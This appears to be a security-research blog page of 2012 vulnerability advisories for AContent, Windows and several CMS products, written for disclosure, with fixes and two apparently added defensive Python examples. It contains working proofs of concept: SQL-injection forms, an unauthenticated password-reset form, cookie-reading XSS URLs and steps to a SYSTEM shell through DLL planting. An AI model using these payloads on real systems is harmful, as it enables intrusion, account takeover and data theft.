Thursday, October 25, 2012

HTB23117: AContent multiple vulnerabilities

Multiple security vulnerabilities discovered by High-Tech Bridge Security Research Lab in AContent version 1.2.

AContent Advisory ID: HTB23117
Product: AContent
Vendor: ATutor
Vulnerable Version(s): 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: September 26, 2012
Public Disclosure: October 17, 2012
Vulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/)

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) SQL Injection in AContent: CVE-2012-5167

1.1 The vulnerability exists due to insufficient sanitisation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in the application's database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitisation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in the application's database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.3 Input passed via the "id" GET parameter to /user/user_password.php in a POST request is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">
<input type="hidden" name="submit" value="1" />
<input type="submit" id="btn">
</form>

Successful exploitation of vulnerability 1.3 requires the attacker to be registered and logged in.

2) Improper Authentication in AContent: CVE-2012-5168

2.1 The vulnerability exists due to absent authentication in the "/user/index_inline_editor_submit.php" script. A remote unauthorized attacker can change users' passwords.

The following example changes the password of the user with id=1 to 'password' (submitted as its SHA-1 hash):

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password-1" />
<input type="hidden" name="value" value="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" />
<input type="submit" id="btn">
</form>

2.2 The vulnerability exists due to absent authentication in the "/course_category/index_inline_editor_submit.php" script. A remote unauthorized attacker can modify names for existing categories.

The following example changes the name of the category with id=1 to 'new_category':

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1" />
<input type="hidden" name="value" value="new_category" />
<input type="submit" id="btn">
</form>
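As an added illustration (not AContent's own code), this is how an inline-editor submit handler of the kind abused in 1.1, 1.2, 2.1 and 2.2 can be hardened: the "field" value is parsed against a strict grammar, table and column names come only from a whitelist, the row id and value are bound parameters, and an administrator session is required before any update runs. The session structure, whitelist and in-memory tables are constructed assumptions for the example.

```python
import re
import sqlite3

# Columns the inline editor may update, keyed by table. This whitelist is constructed
# for the example; AContent's real schema is not reproduced here. "password" is left
# out deliberately: a password change needs its own authenticated flow.
ALLOWED_FIELDS = {
    "course_category": {"category_name"},
    "user": {"first_name", "last_name", "email"},
}

# The editor sends field="<column>-<row id>"; only that exact grammar is accepted.
FIELD_RE = re.compile(r"^(?P<column>[a-z_]+)-(?P<id>[1-9][0-9]*)$")


def parse_field(field):
    """Split the 'field' parameter into (column, id) or raise on anything else,
    so a value carrying extra SQL after the id never reaches the query layer."""
    m = FIELD_RE.match(field)
    if m is None:
        raise ValueError("malformed field parameter")
    return m.group("column"), int(m.group("id"))


def inline_update(conn, table, session, field, value):
    """Hardened stand-in for index_inline_editor_submit.php (hypothetical logic):
    require an administrator session, whitelist table and column, bind the rest."""
    if not session.get("is_admin"):
        raise PermissionError("administrator login required")
    column, row_id = parse_field(field)
    if column not in ALLOWED_FIELDS.get(table, set()):
        raise ValueError(f"{table}.{column} is not editable")
    # table and column come only from the whitelist; id and value are bound parameters
    cur = conn.execute(f"UPDATE {table} SET {column} = ? WHERE id = ?", (value, row_id))
    return cur.rowcount


def make_demo_db():
    """Constructed in-memory tables standing in for the two the advisory names."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course_category (id INTEGER PRIMARY KEY, category_name TEXT)")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO course_category VALUES (1, 'Mathematics')")
    conn.execute("INSERT INTO user VALUES (1, 'admin@example.invalid', 'hash')")
    return conn


def category_name(conn, row_id):
    """Read back a category name so the effect of an update can be checked."""
    row = conn.execute("SELECT category_name FROM course_category WHERE id = ?",
                       (row_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_demo_db()
    admin = {"is_admin": True}
    inline_update(db, "course_category", admin, "category_name-1", "new_category")
    print(category_name(db, 1))
    for bad in ("category_name-1 AND 1=(select 1)", "password-1"):
        try:
            inline_update(db, "user", admin, bad, "x")
        except ValueError as exc:
            print("rejected:", bad, "->", exc)
```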

3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169

Input passed via the HTTP GET parameters "pathext", "popup", "framed", and "file" to /file_manager/preview_top.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected website.

The following PoCs (Proof of Concept) demonstrate the vulnerabilities:

http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

Users should apply patches #1 and #2 using the AContent Administrator's Updater tool.

More Information:
http://update.atutor.ca/acontent/patch/1_2/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.
[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and repository used to create interoperable, accessible, adaptive Web-based learning content.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23113: Subrion CMS multiple vulnerabilities

Subrion CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS version 2.2.1 which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and Cross-Site Request Forgery (CSRF) attacks.

  • SQL Injection in Subrion CMS:
    Input passed via the "plan_id" POST parameter to the "/register/" URL (rewritten by mod_rewrite to the "system.php" script) is not properly sanitised before being used in an SQL query.

  • Cross-Site Scripting (XSS) in Subrion CMS:
    Input passed via the "f[accounts][fullname]" and "f[accounts][username]" GET parameters to the "/advsearch/" URL (rewritten by mod_rewrite to the "system.php" script), and via the "id" and "group" GET parameters to multiple files, is not properly sanitised before being returned to the user.

  • Cross-Site Request Forgery (CSRF) in Subrion CMS:
    It is possible to create an administrative account within the application.

Proof of concept (PoC) examples are available on the original advisory page: HTB23113 - Multiple vulnerabilities in Subrion CMS.

HTB23107: jCore multiple vulnerabilities

jCore

jCore, a free and open source content management system (CMS), version 1.0pre, suffers from SQL injection and XSS vulnerabilities.

The vulnerabilities were discovered by High-Tech Bridge Security Research Lab and published on the advisory page:

High-Tech Bridge Advisory HTB23107 - Multiple vulnerabilities in jCore.

SQL injection: input passed via the "memberloginid" COOKIE parameter to "admin/index.php" is not properly sanitised before being used in an SQL query.

XSS: input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.

Solution: upgrade to the latest release.

HTB23099: Samsung Kies multiple vulnerabilities

Multiple vulnerabilities in Samsung Kies version 2.3.2.12054_20 and probably prior have been discovered by High-Tech Bridge Security Research Lab. They allow a remote attacker to compromise the affected system: execute and modify arbitrary files, modify arbitrary directories and modify the System Registry with the privileges of the current user. Vulnerability types in HTB23099: NULL pointer dereference and improper access control.

  • Null Pointer Dereference in Samsung Kies:
    The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control.

  • Arbitrary File Execution in Samsung Kies:
    The CmdAgent.dll library has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

  • Arbitrary Directory Modification in Samsung Kies:
    The CmdAgent.dll library has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

  • Arbitrary Registry Modification in Samsung Kies:
    The CmdAgent.dll library has numerous Registry modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

PoC examples, additional details and fix information are available on the researcher's page.

Friday, October 12, 2012

CVE-2012-1535: Adobe Flash Player integer overflow vulnerability analysis

Brian Mariani and Frederic Bourla from High-Tech Bridge have published the whitepaper "CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis". The publication explains the particulars of the CVE-2012-1535 security vulnerability in detail.

You can download PDF here: CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis.

HTB23116: OpenX cross-site scripting & SQL injection vulnerabilities

OpenX

Multiple vulnerabilities in OpenX were discovered by High-Tech Bridge Security Research Lab three weeks ago and disclosed this week.

  • Cross-Site Scripting (XSS) in OpenX: Input passed via the "parent" GET parameter to "www/admin/plugin-index.php" is not properly sanitised before being returned to the user.

  • SQL Injection in OpenX: Input passed via the "ids[]" POST parameter to "www/admin/campaign-zone-link.php" is not properly sanitised before being used in an SQL query.

To fix these issues, replace the affected files with those from the SVN repository, as described in High-Tech Bridge security advisory HTB23116: Multiple vulnerabilities in OpenX. PoC examples are also available on the researcher's page.

Thursday, October 11, 2012

How to Secure Your Digital Assets in the Era of Cyber War (October, 16)

High-Tech Bridge Annual Conference

Date: 16 October 2012
Venue: Crowne Plaza Hotel, Geneva, Switzerland

Businesses of all sizes are embracing new approaches to IT (such as cloud computing, virtualisation, BYOD and BPO), making them more and more dependent upon their IT infrastructure. This dynamic IT environment stimulates hackers, and organisations face increasingly targeted and sophisticated attacks. The attackers range from individual "hacktivists" to organised crime rings and totalitarian nation-states. Many hackers are highly organised and skilled.

Despite the prevalence of firewalls, IDS/IPS, encryption and other security measures, many organisations continue to fall victim to hacking attacks due to configuration errors or inadequate security solutions. As a result, companies are beginning to recognise the importance of regular security audits, because human experience and analysis are essential to the maintenance of a strong network security perimeter.

To raise awareness of the threat facing all types of organisations, High-Tech Bridge organises its annual conference entitled "How to Secure Your Digital Assets in the Era of Cyber War". The conference will take place on Tuesday, 16 October 2012, at Crowne Plaza Hotel, Geneva.

Frost & Sullivan Principal Alexander Michael will be speaking at the conference with the following presentation: "Ethical Hacking: Why it is a Business Investment, not a Cost".

For additional information about the event, please follow the link: https://www.htbridge.com/events/high_tech_bridge_annual_conference_2012.html

If you would like to obtain Mr Michael's presentation or receive Frost & Sullivan's two recent security whitepapers, please contact Joanna Lewandowska, Corporate Communications, at joanna.lewandowska (at) frost.com.

Source: How to Secure Your Digital Assets in the Era of Cyber War (frost.com)

HTB23108: Privilege escalation vulnerability in Microsoft Windows

This Tuesday, October 9, High-Tech Bridge has disclosed details of security advisory HTB23108: Privilege escalation vulnerability in Microsoft Windows.

Vendor: Microsoft Corporation
Vulnerable Versions: Windows Vista, Windows Server 2008, Windows 7, Windows 8 RP
Tested Version: Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 Professional SP1, Windows 8 RP
Vulnerability Type: Uncontrolled Search Path Element [CWE-427]
CVE Reference: Pending
CVSSv2 Base Score: 6 (AV:L/AC:H/Au:S/C:C/I:C/A:C)
Risk Level: Medium

Description

High-Tech Bridge Security Research Lab has discovered a vulnerability in Microsoft Windows which could be exploited to escalate privileges under certain conditions.

The vulnerability exists due to the "IKE and AuthIP IPsec Keying Modules" system service, which tries to load the "wlbsctrl.dll" DLL, a library that is missing after a default Windows installation.

The "IKE and AuthIP IPsec Keying Modules" service starts automatically in the default configuration (after a default installation) of:

  • Microsoft Windows Vista
  • Microsoft Windows 2008
  • Microsoft Windows 7
  • Microsoft Windows 8 Release Preview

Moreover, the service runs with SYSTEM privileges by default. Therefore an unprivileged local user who has write access to any default or other location in the search PATH can execute arbitrary code on the vulnerable system with the privileges of the SYSTEM account.

Vulnerability Details

The "IKE and AuthIP IPsec Keying Modules" service tries to load the "wlbsctrl.dll" library, which is missing. This forces Windows to use its search PATH procedure to locate the missing dynamic-link library, in the order documented by Microsoft:

  • The directory from which the application loaded
  • The system directory
  • The 16-bit system directory
  • The Windows directory
  • The current directory
  • The directories that are listed in the PATH environment variable

When a directory is created in the C:\ root folder, access permissions for files and subfolders are inherited from the parent directory. By default, members of the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA rights on all directories created within the C:\ root folder. This also applies to folders created by an application's installer. The vulnerability is introduced when software does not change the default permissions of its installation directory and adds its installation path to the PATH system environment variable. Any member of the Authenticated Users group can then place a malicious file named "wlbsctrl.dll" in that folder and execute arbitrary code on the system after a simple reboot.

Brief research confirmed that the following well-known software makes the weakness exploitable when installed into the C:\ root folder:

- ActivePerl 5.16.1.1601 (default installation): CVE-2012-5377
Adds to the PATH variable: C:\Perl\Site\bin;

- ActiveTcl 8.5.12 (default installation): CVE-2012-5378
Adds to the PATH variable: C:\TD\bin

- ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5379
Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts;

- Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5380
Adds to the PATH variable: C:\Ruby193\bin;

- PHP 5.3.17 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\PHP): CVE-2012-5381
Adds to the PATH variable: C:\PHP\;

- Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C root folder, e.g. C:\Zend): CVE-2012-5382
Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin

- MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\MySQL): CVE-2012-5383
Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin

Attack vectors

Any member of the Authenticated Users group can escalate privileges to SYSTEM when the following conditions are met:

  1. The above-mentioned software sets insecure permissions on its installation folder (so that it is writable by members of the Authenticated Users group).
  2. The above-mentioned software adds its installation path to the system PATH environment variable.
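An added audit for the two conditions above (this is example code, not part of the advisory or of any Microsoft tool): it parses the output of `icacls` for every entry on the system PATH and flags directories where Authenticated Users, Users or Everyone hold an allow ACE with a write-capable right, which is exactly the precondition for planting the missing DLL. The embedded icacls text is constructed to mirror the layout Windows 7 prints, and the principal and right abbreviations are the standard icacls ones; `collect_icacls` gathers real output on a live host.

```python
import re
import subprocess

# Principals every interactive user belongs to. A write-capable allow ACE for one of them
# on a PATH directory lets an unprivileged user plant a DLL (such as the missing
# wlbsctrl.dll) where the SYSTEM service will find it during the search PATH procedure.
LOW_PRIV_PRINCIPALS = {"NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users", "Everyone"}
# icacls rights that permit creating or writing files: simple F/M/W plus specific
# WD (write data / add file), AD (append data / add subdirectory), GW/GA (generic).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GW", "GA"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Za-z,]+\))+)$")

# Constructed icacls output in the layout Windows 7 prints; not captured from a real host.
SAMPLE_ICACLS = {
    r"C:\Perl\site\bin": r"""C:\Perl\site\bin NT AUTHORITY\Authenticated Users:(I)(M)
                 NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                 NT AUTHORITY\SYSTEM:(I)(F)
                 BUILTIN\Users:(I)(RX)""",
    r"C:\Windows\system32": r"""C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
                    NT AUTHORITY\SYSTEM:(M)
                    BUILTIN\Users:(RX)
                    BUILTIN\Users:(OI)(CI)(IO)(GR,GE)""",
}

def writable_by_low_priv(path, icacls_output):
    """Return the low-privilege principals holding an allow ACE with a write right
    on `path` itself. Inherit-only (IO) ACEs do not apply to the directory."""
    found = set()
    for raw in icacls_output.splitlines():
        line = raw.strip()
        if line.startswith(path):  # icacls prints the path in front of the first ACE
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m is None:
            continue
        tokens = {t for grp in re.findall(r"\(([^)]+)\)", m.group("flags"))
                  for t in grp.split(",")}
        if "DENY" in tokens or "IO" in tokens:
            continue
        if m.group("who") in LOW_PRIV_PRINCIPALS and tokens & WRITE_RIGHTS:
            found.add(m.group("who"))
    return found

def audit_path(path_value, icacls_outputs):
    """Walk a PATH string; report entries writable by low-privilege principals."""
    findings = []
    for entry in path_value.split(";"):
        entry = entry.strip().rstrip("\\")
        if entry in icacls_outputs:
            who = writable_by_low_priv(entry, icacls_outputs[entry])
            if who:
                findings.append((entry, who))
    return findings

def collect_icacls(path_value):
    """On a live Windows host, capture `icacls <dir>` for every PATH entry; pass the
    result together with the same PATH string to audit_path()."""
    outputs = {}
    for entry in path_value.split(";"):
        entry = entry.strip().rstrip("\\")
        if entry:
            outputs[entry] = subprocess.run(["icacls", entry], capture_output=True,
                                            text=True).stdout
    return outputs
```

A finding for a directory is the cue to either remove that entry from PATH or tighten its ACL, which is the mitigation Microsoft's response below recommends.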

Proof of Concept

You can download the PoC (Proof of Concept) that demonstrates exploitation of the vulnerability under a non-privileged user account on a default installation of Windows 7 with a default installation of the latest version of ActivePerl.

How to exploit:

  1. Log in under an unprivileged system account.
  2. Download and extract the HTB23108-P0c-Windows-Services.rar archive.
  3. Copy the files from the archive into the C:\Perl\site\bin folder.
  4. Reboot the system.
  5. Log in under an unprivileged system account.
  6. Run the C:\Perl\site\bin\ADMC.exe file.
  7. Enter the following credentials when asked:
    Login: fox
    Password: 1234

  8. Type "shell" and then the "whoami" command in the system console; you will see "nt authority\system", which means you have an administrative console.

Conclusion

Many Windows services have missing DLLs, and the search PATH procedure is a built-in Windows feature. However, in this case the service with the missing DLL runs by default with SYSTEM privileges. Combined with some well-known software in its default installation, this "feature" becomes a readily exploitable vulnerability in a fairly common Windows configuration.

Solution:

Official MSRC answer:
Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

Microsoft requested and approved disclosure of the advisory on 9 October 2012.

Please refer to our Disclosure Policy if you have any questions.

References:

[1] High-Tech Bridge Advisory HTB23108 - https://www.htbridge.com/advisory/HTB23108 - Privilege Escalation Vulnerability in Microsoft Windows
[2] Microsoft Windows - http://www.microsoft.com - Microsoft Windows is a series of graphical interface operating systems developed, marketed, and sold by Microsoft.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Monday, October 8, 2012

HTB23115: Template CMS multiple vulnerabilities

Template CMS version 2.1.1 suffers from XSS and CSRF vulnerabilities.

Template CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

  • CWE-79: cross-site scripting in Template CMS:
    Input passed via the "themes_editor" POST parameter to "admin/index.php" is not properly sanitised before being returned to the user (CVE-2012-4901).
    CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)

  • CWE-352: cross-site request forgery
    Template CMS v.2.1.1 allows an authorized administrator to perform certain actions via HTTP requests without proper validity checks to verify the source of the requests (CVE-2012-4902).
    CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Related links: